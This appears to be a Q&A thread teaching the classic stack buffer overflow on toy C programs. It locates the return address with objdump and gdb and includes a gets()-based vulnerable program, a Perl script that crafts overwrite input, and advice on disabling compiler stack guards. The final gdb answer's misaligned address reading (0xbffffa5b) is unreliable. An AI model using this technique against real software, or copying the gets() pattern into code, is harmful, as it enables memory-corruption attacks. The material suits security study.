Trying to smash the stack

Question 1

Here's a guide I wrote for a friend a while back on performing a buffer overflow attack using gets. It goes over how to get the return address and how to use it to write over the old one:

Our knowledge of the stack tells us that the return address appears on the stack after the buffer you're trying to overflow. However, how far after the buffer the return address appears depends on the architecture you're using. In order to determine this, first write a simple program and inspect the assembly:

C code:

void function() 
{
    char buffer[4];
}

int main() 
{
    function();
}

Assembly (abridged):

function:
    pushl %ebp
    movl %esp, %ebp
    subl $16, %esp
    leave
    ret
main:
    leal 4(%esp), %ecx
    andl $-16, %esp
    pushl -4(%ecx)
    pushl %ebp
    movl %esp, %ebp
    pushl %ecx
    call function
    ...

There are several tools that you can use to inspect the assembly code. First, of course, is compiling straight to assembly output from gcc using gcc -S main.c. This can be difficult to read since there are little to no hints for what code corresponds to the original C code. Additionally, there is a lot of boilerplate code that can be difficult to sift through. Another tool to consider is gdbtui. The benefit of using gdbtui is that you can inspect the assembly source while running the program and manually inspect the stack throughout the execution of the program. However, it has a steep learning curve.

The assembly inspection program that I like best is objdump. Running objdump -dS a.out gives the assembly source with the context from the original C source code. Using objdump, on my computer the offset of the return address from the character buffer is 8 bytes.

This function function takes the return address and increments 7 to it. The instruction that the return address originally pointed to is 7 bytes in length, so adding 7 makes the return address point to the instruction immediately after the assignment.

In the example below, I overwrite the return address to skip the instruction x = 1.

simple C program:

void function() 
{
    char buffer[4];
    /* return address is 8 bytes beyond the start of the buffer */
    int *ret = buffer + 8;
    /* assignment instruction we want to skip is 7 bytes long */
    (*ret) += 7;
}

int main() 
{
    int x = 0;
    function();
    x = 1;
    printf("%d\n",x);
}

Main function (x = 1 at 80483af is seven bytes long):

8048392: 8d4c2404       lea 0x4(%esp),%ecx
8048396: 83e4f0         and $0xfffffff0,%esp
8048399: ff71fc         pushl -0x4(%ecx)
804839c: 55             push %ebp
804839d: 89e5           mov %esp,%ebp
804839f: 51             push %ecx
80483a0: 83ec24         sub $0x24,%esp
80483a3: c745f800000000 movl $0x0,-0x8(%ebp)
80483aa: e8c5ffffff     call 8048374 <function>
80483af: c745f801000000 movl $0x1,-0x8(%ebp)
80483b6: 8b45f8         mov -0x8(%ebp),%eax
80483b9: 89442404       mov %eax,0x4(%esp)
80483bd: c70424a0840408 movl $0x80484a0,(%esp)
80483c4: e80fffffff     call 80482d8 <printf@plt>
80483c9: 83c424         add $0x24,%esp
80483cc: 59             pop %ecx
80483cd: 5d             pop %ebp

We know where the return address is and we have demonstrated that changing it can affect the code that is run. A buffer overflow can do the same thing by using gets and inputing the right character string so that the return address is overwritten with a new address.

In a new example below we have a function function which has a buffer filled using gets. We also have a function uncalled which never gets called. With the correct input, we can run uncalled.

#include <stdio.h>
#include <stdlib.h>

void uncalled() 
{
    puts("uh oh!");
    exit(1);
}

void function() 
{
    char buffer[4];
    gets(buffer);
}

int main() 
{
    function();
    puts("program secure");
}

To run uncalled, inspect the executable using objdump or similar to find the address of the entry point of uncalled. Then append the address to the input buffer in the right place so that it overwrites the old return address. If your computer is little-endian (x86, etc.) , you need to swap the endianness of the address.

In order to do this correctly, I have a simple perl script below, which generates the input that will cause the buffer overflow that will overwrite the return address. It takes two arguments, first it takes the new return address, and second it takes the distance (in bytes) from the beginning of the buffer to the return address location.

#!/usr/bin/perl
print "x"x@ARGV[1];                                            # fill the buffer
print scalar reverse pack "H*", substr("0"x8 . @ARGV[0] , -8); # swap endian of input
print "\n";                                                    # new line to end gets

Question 2

You need to examine the stack to determine if buffer1+12 is actually the right address to be modifying. This sort of stuff isn't exactly very portable.

I'd probably also place some eye catchers in the code so you can see where the buffers are on the stack in relation to the return address:

char buffer1[5] = "1111";
char buffer2[10] = "2222";

Question 3

You can figure this out by printing out the stack. Add code like this:

int* pESP;
__asm mov pESP, esp

The __asm directive is Visual Studio specific. Once you have the address of the stack you can print it out and see what is in there. Note that the stack will change when you do things or make calls, so you have to save the whole block of memory at once by first copying the memory at the stack address to an array, then you print out the array.

What you will find is all kinds of garbage having to do with the stack frame and various runtime checks. By default VS will put guard code in the stack to prevent exactly what you are trying to do. If you print out the assembly listing for "function" you will see this. You need to set a compiler switches to turn all this stuff off.

Question 4

As an alternative to the methods suggested in other answers, you can figure this sort of thing out using gdb. To make the output a bit easier to read, I remove the buffer2 variable, and change buffer1 to 8 bytes so things are more aligned. We will also compile in 32 bit more do make it easier to read the addresses, and turn debugging on(gcc -m32 -g).

void function(int a, int b, int c) {
   char buffer1[8];
   char *ret;

so let's print the address of buffer1:

(gdb) print &buffer1
$1 = (char (*)[8]) 0xbffffa40

then let's print a bit past that and see what's on the stack.

(gdb) x/16x 0xbffffa40
0xbffffa40: 0x00001000  0x00000000  0xfecf25c3  0x00000003
0xbffffa50: 0x00000000  0xbffffb50  0xbffffa88  0x00001f3b
0xbffffa60: 0x00000001  0x00000002  0x00000003  0x00000000
0xbffffa70: 0x00000003  0x00000002  0x00000001  0x00001efc

Do a backtrace to see where the return address should be pointing:

(gdb) bt
#0  function (a=1, b=2, c=3) at foo.c:18
#1  0x00001f3b in main () at foo.c:26

and sure enough, there it is at 0xbffffa5b:

(gdb) x/x 0xbffffa5b
0xbffffa5b: 0x001f3bbf